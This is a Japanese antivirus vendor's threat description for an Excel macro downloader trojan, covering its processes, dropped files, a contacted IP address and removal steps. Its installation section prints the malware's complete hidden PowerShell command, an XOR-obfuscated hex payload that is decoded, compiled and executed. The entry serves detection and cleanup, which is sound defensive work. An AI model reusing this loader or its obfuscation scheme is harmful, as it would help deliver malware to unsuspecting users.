Trend Micro Security

Trojan.X97M.POWLOAD.USMANFOGBK

2019年11月9日

 別名:

TrojanDownloader:O97M/Obfuse.OR!MTB (Microsoft); RDN/Generic Downloader.x (McAfee)

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:


  • マルウェアタイプ: トロイの木馬型
  • 破壊活動の有無: なし
  • 暗号化:  
  • 感染報告の有無: はい

  概要


マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。


  詳細

ファイルサイズ 73,728 bytes
タイプ XLS
メモリ常駐 はい
発見日 2019年11月9日

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

  • "%System%\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden function mcd2a64 {param($h92b6)$haa52='nab35';$d895a14='';for ($i=0; $i -lt $h92b6.length;$i+=2){$afd579c=[convert]::ToByte($h92b6.Substring($i,2),16);$d895a14+=[char]($afd579c -bxor $haa52[($i/2)%$haa52.length]);}return $d895a14;} $cb25ee7 = '1b120b5d524e321b40410b0c594646070f05136617121656584033175d41070c071d7c001507415a1e32074143070207400e1b120b5d524e321b40410b0c4c775c0f060c5c461a0801400e1b120b5d524e321b40410b0c4c7a7a5514115a5b0941314a461a040f1d7b0b15593e3f1e14005f5c0d41015f541d124244025902015751153a265f59270c125c471a494058501c0f075f065c434e765b1a131b635a070f160e17290416634701022357511c04114017473c4243400c0d0b50151d1503475c0d41074b410b130c137c00153247474e070450010d492b5d413e151013560d535b57575f4d114747070f05134d5950060a01475a39775902280f435a1c154a115e0b130c56595d53401f152b0f16414c3e0e0b5d414e5c4211790100067f5c0c1303414c4c483f13451b030e5a564e12165241070242564d1a04105d15270f1663411c41030a575f524a40411c080c54151e57560b530a564b086e2a0d0e7a581e0e10471d4c0a07415b0b0d5101174241275d411c18325c5c00155f116307131646540231105c410b0216111c334112465702080113461a00165a564e041a47501c0f42515a010d4257005c02041b7c00153247474e18030b540f554e667c00153247474e18070a575d4d42465c00154244575f505402194e0e1747151b080c471500525a010c475a39775902280f435a1c154a117e0b130c56595d534c575902434e13700015104a6501080c47084c33165f780117077e50030e104a17424131564122001147701c130d410808000e4050473c4240410f150b50150b191656470041145c5c0a41070b560d04001b7c00153247474e1251010059594e7a5b1a3116411516595b5657084d0b5d414e095751515600561a0e1e14005f5c0d411147541a0801135c00154255565a050702064648197a5b1a311641151d590702065d56420e150f58000206460c0157070f57561b175e075250045f540302575e005257050b434b1a0e07074a400d0b50510002535c2b5d413e15101d6f0b130d1a4e090e165c150154070a53551c2b5d413e1510134d0c0751560d53070450010d49110b505f52510419030206015458554a110708510102045b005405050a51520356595056030556515503025a50401a1c5508041b4d0c0751560d535c2b5d413e15101d6f0b130d1a4e090e165c150154070a53551c377a5b1a311641150a025307030b5c4a667c0015324747475459465c00154243565f00040e055508041b140a5450505346190055060b594e57565f555456195e1956031901141613450d5003551c471a055c4101410d06505707594e7717150768684e055102015a58030e4e5e195102195e190455195e195b034855280c47651a134250015d03060e780f13115b54024f235f5901022a74590103035f1d5d48597e541c120a525940220d434c46055102015a58031f0542025600570a4d511a0e0b590150500c490c56424e280c47651a134a4b570852070b1b3a0e2b5d4158554a1a1e5e195203040c484e50015d03061f06475a0d065057075813620b03215f5c0b0f16134f59030357040f5c0c56424e360751760208075d4146485940411c080c541505070757575d575f765b1808105c5b03040c471b290416755a02050741650f150a1b7000170b415a000c075d41403212565607000e755a020507411b2f11125f5c0d00165a5a0025034754474a406f6919050302024c4a0f50515c0054071d4c555203015f00570517475a1804570f0553521b2a0e155d59010006755c02044a5e560a5303050146435205045b505407065e075602010b545503075f0357050056550103075e5357550108545103545e5056020559525602565e555756005f545003545e545603055a500306034c484e58530b05000003475a32415a0d041140661a0010477c00070d13580d0456020800041513651c0e0156461d321652471a280c555a460a0456510c52541a0e3e130d50501d124c60410f13161b580d0456021c55130747401c0f42030e131117515907024240410f150b50151d15105a5b09410f50515c0054071d1d15105a5b09411605560d04041a4e1d15105a5b094101500757050002084c0f0351065b435940411c080c54150f58000206533216415c00064c76581e151b085301134a5a5b1a410b0e0555085e47030d0207551b22040c5441065a0b18085c4819514c1a044255530d55010e76010f1456471a4f365c771715071b41580201565340321751461a130b5d5246084e011c4250541a0e0f58000206455c4a505d0f134b1b5308025650153041015007570500026e46084d011c4e444250565c58065104402d075d521a093f1a0e13130747401c0f42520c0c5051084813'; $cb25ee72 = mcd2a64($cb25ee7); Add-Type -TypeDefinition $cb25ee72; [w77ccdd]::fc4de13();
  • powershell -WindowStyle Hidden function mcd2a64 {param($h92b6)$haa52='nab35';$d895a14='';for ($i=0; $i -lt $h92b6.length;$i+=2){$afd579c=[convert]::ToByte($h92b6.Substring($i,2),16);$d895a14+=[char]($afd579c -bxor $haa52[($i/2)%$haa52.length]);}return $d895a14;} $cb25ee7 = '1b120b5d524e321b40410b0c594646070f05136617121656584033175d41070c071d7c001507415a1e32074143070207400e1b120b5d524e321b40410b0c4c775c0f060c5c461a0801400e1b120b5d524e321b40410b0c4c7a7a5514115a5b0941314a461a040f1d7b0b15593e3f1e14005f5c0d41015f541d124244025902015751153a265f59270c125c471a494058501c0f075f065c434e765b1a131b635a070f160e17290416634701022357511c04114017473c4243400c0d0b50151d1503475c0d41074b410b130c137c00153247474e070450010d492b5d413e151013560d535b57575f4d114747070f05134d5950060a01475a39775902280f435a1c154a115e0b130c56595d53401f152b0f16414c3e0e0b5d414e5c4211790100067f5c0c1303414c4c483f13451b030e5a564e12165241070242564d1a04105d15270f1663411c41030a575f524a40411c080c54151e57560b530a564b086e2a0d0e7a581e0e10471d4c0a07415b0b0d5101174241275d411c18325c5c00155f116307131646540231105c410b0216111c334112465702080113461a00165a564e041a47501c0f42515a010d4257005c02041b7c00153247474e18030b540f554e667c00153247474e18070a575d4d42465c00154244575f505402194e0e1747151b080c471500525a010c475a39775902280f435a1c154a117e0b130c56595d534c575902434e13700015104a6501080c47084c33165f780117077e50030e104a17424131564122001147701c130d410808000e4050473c4240410f150b50150b191656470041145c5c0a41070b560d04001b7c00153247474e1251010059594e7a5b1a3116411516595b5657084d0b5d414e095751515600561a0e1e14005f5c0d411147541a0801135c00154255565a050702064648197a5b1a311641151d590702065d56420e150f58000206460c0157070f57561b175e075250045f540302575e005257050b434b1a0e07074a400d0b50510002535c2b5d413e15101d6f0b130d1a4e090e165c150154070a53551c2b5d413e1510134d0c0751560d53070450010d49110b505f52510419030206015458554a110708510102045b005405050a51520356595056030556515503025a50401a1c5508041b4d0c0751560d535c2b5d413e15101d6f0b130d1a4e090e165c150154070a53551c377a5b1a311641150a025307030b5c4a667c0015324747475459465c00154243565f00040e055508041b140a5450505346190055060b594e57565f555456195e1956031901141613450d5003551c471a055c4101410d06505707594e7717150768684e055102015a58030e4e5e195102195e190455195e195b034855280c47651a134250015d03060e780f13115b54024f235f5901022a74590103035f1d5d48597e541c120a525940220d434c46055102015a58031f0542025600570a4d511a0e0b590150500c490c56424e280c47651a134a4b570852070b1b3a0e2b5d4158554a1a1e5e195203040c484e50015d03061f06475a0d065057075813620b03215f5c0b0f16134f59030357040f5c0c56424e360751760208075d4146485940411c080c541505070757575d575f765b1808105c5b03040c471b290416755a02050741650f150a1b7000170b415a000c075d41403212565607000e755a020507411b2f11125f5c0d00165a5a0025034754474a406f6919050302024c4a0f50515c0054071d4c555203015f00570517475a1804570f0553521b2a0e155d59010006755c02044a5e560a5303050146435205045b505407065e075602010b545503075f0357050056550103075e5357550108545103545e5056020559525602565e555756005f545003545e545603055a500306034c484e58530b05000003475a32415a0d041140661a0010477c00070d13580d0456020800041513651c0e0156461d321652471a280c555a460a0456510c52541a0e3e130d50501d124c60410f13161b580d0456021c55130747401c0f42030e131117515907024240410f150b50151d15105a5b09410f50515c0054071d1d15105a5b09411605560d04041a4e1d15105a5b094101500757050002084c0f0351065b435940411c080c54150f58000206533216415c00064c76581e151b085301134a5a5b1a410b0e0555085e47030d0207551b22040c5441065a0b18085c4819514c1a044255530d55010e76010f1456471a4f365c771715071b41580201565340321751461a130b5d5246084e011c4250541a0e0f58000206455c4a505d0f134b1b5308025650153041015007570500026e46084d011c4e444250565c58065104402d075d521a093f1a0e13130747401c0f42520c0c5051084813'; $cb25ee72 = mcd2a64($cb25ee7); Add-Type -TypeDefinition $cb25ee72; [w77ccdd]::fc4de13();
  • "%Windows%\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"%User Temp%\-dluabht.cmdline"
  • %Windows%\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%User Temp%\RESC5AF.tmp" "%User Temp%\CSCC58F.tmp"

(註:%System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.. %User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。)

作成活動

マルウェアは、以下のファイルを作成します。

  • %User Temp%\-dluabht.0.cs
  • %User Temp%\-dluabht.err
  • %User Temp%\-dluabht.dll
  • %User Temp%\-dluabht.cmdline
  • %Application Data%\wda17.exe
  • %User Temp%\10914273.od
  • %System Root%\BVTBin\Tests\installpackage\csilogfile.log
  • %User Temp%\-dluabht.pdb
  • %User Temp%\-dluabht.out

(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。. %System Root%フォルダは、オペレーティングシステム(OS)が存在する場所で、いずれのOSでも通常、 "C:" です。.)

その他

マルウェアは、以下の不正なWebサイトにアクセスします。

  • {BLOCKED}171.194

このウイルス情報は、自動解析システムにより作成されました。


  対応方法

対応検索エンジン: 9.850

手順 1

Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

「Trojan.X97M.POWLOAD.USMANFOGBK」で検出したファイル名を確認し、そのファイルを終了します。

[ 詳細 ]

  • すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
  • 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
    セーフモードについては、こちらをご参照下さい。
  • 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。

手順 3

以下のファイルを検索し削除します。

[ 詳細 ]
コンポーネントファイルが隠しファイル属性の場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
  • %User Temp%\-dluabht.0.cs
  • %User Temp%\-dluabht.err
  • %User Temp%\-dluabht.dll
  • %User Temp%\-dluabht.cmdline
  • %Application Data%\wda17.exe
  • %User Temp%\10914273.od
  • %System Root%\BVTBin\Tests\installpackage\csilogfile.log
  • %User Temp%\-dluabht.pdb
  • %User Temp%\-dluabht.out

手順 4

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.X97M.POWLOAD.USMANFOGBK」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください